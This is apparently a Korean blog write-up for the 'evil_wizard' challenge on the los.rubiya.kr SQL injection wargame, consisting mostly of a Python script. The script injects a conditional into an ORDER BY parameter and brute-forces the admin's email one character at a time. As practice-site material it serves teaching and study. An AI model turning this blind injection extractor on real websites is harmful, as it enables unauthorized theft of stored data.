웹찢남

evil_wizard-writeup 본문

WEB_HACKING/los.rubiya.kr

evil_wizard-writeup

harry595 2020. 1. 29. 21:04

 

 

저번의 문제와 별 다를 게없다, hell_fire에서 benchmark나 sleep 을 통하여 문제를 푸는거 였나보다,,,

 

import re
import requests
import time

flag = ''
length= 0
session =dict(PHPSESSID="자신의 PHPSESSID")
for i in range (1,40):
        for j in range(48,128):
                        r=requests.post("https://los.rubiya.kr/chall/evil_wizard_32e3d35835aa4e039348712fb75169ad.php?order=if(id='admin' and ord(substr(email,"+str(i)+",1))="+str(j)+",score,1234)",cookies=session)
                        if 'scoreadmin' in r.text:
                                flag=flag+str(chr(j))
                                print("finding pw: "+flag)
                                break
print("pw "+flag)



                

'WEB_HACKING > los.rubiya.kr' 카테고리의 다른 글

red_dragon-writeup  (0) 2020.01.29
green_dragon-writeup  (0) 2020.01.29
hell_fire-writeup  (0) 2020.01.29
dark_eyes-writeup  (0) 2020.01.29
iron_golem-writeup  (0) 2020.01.29
Comments